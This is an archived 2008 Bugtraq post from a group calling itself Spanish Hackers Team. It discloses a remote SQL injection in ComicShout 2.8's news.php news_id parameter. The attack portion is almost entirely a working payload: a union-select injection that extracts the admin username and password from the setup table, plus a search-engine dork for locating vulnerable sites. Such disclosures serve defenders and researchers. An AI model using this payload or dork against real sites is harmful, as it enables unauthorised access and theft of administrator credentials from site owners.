lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20080602155250.12120.qmail@securityfocus.com>
Date: 2 Jun 2008 15:52:50 -0000
From: sys-project@...mail.com
To: bugtraq@...urityfocus.com
Subject: ComicShout 2.8 (news.php news_id) SQL Injection Vulnerability

--==+=================== Spanish Hackers Team (www.spanish-hackers.com) =================+==--
--==+         ComicShout 2.8 (news.php news_id) Remote SQL Injection Vulnerability       +==--
--==+====================================================================================+==--
                         - dreaming of necessity is reason to comply -

[+] Info:

[~] Bug found by JosS
[~] sys-project[at]hotmail.com
[~] http://www.spanish-hackers.com
[~] EspSeC & Hack0wn!.


[~] Software: ComicShout 2.8
[~] Exploit: Remote SQL Injection [High]
[~] Vuln file: news.php

[~] Dork: "Powered by ComicShout"

[+] Exploit:

[~] /news.php?news_id=[SQL]
[~] 4+union+all+select+0,1,site_admin,site_pass+from+setup/*

--==+=================== Spanish Hackers Team (www.spanish-hackers.com) =================+==--
--==+                                       JosS                                         +==--
--==+====================================================================================+==--
                                       [+] [The End]

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ